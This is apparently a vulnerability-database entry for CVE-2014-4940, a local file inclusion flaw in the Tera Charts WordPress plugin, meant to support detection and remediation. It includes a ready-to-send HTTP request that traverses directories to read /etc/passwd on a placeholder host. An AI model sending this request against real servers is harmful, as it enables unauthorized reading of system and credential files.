🔙 목록으로 돌아가기

CVE-2014-4940: WordPress Plugin Tera Charts - Local File Inclusion

TitleWordPress Plugin Tera Charts - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server.
RemediationUpdate to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability.
CVSS Score5
EPSS Score0.57666
CVE IDCVE-2014-4940
CWE IDCWE-22
Tags cve2014 cve wordpress wp-plugin lfi tera_charts_plugin_project vuln

🔍 Vulnerability Description

Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.

🌐 HTTP Request

GET /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-4940.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-4940.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A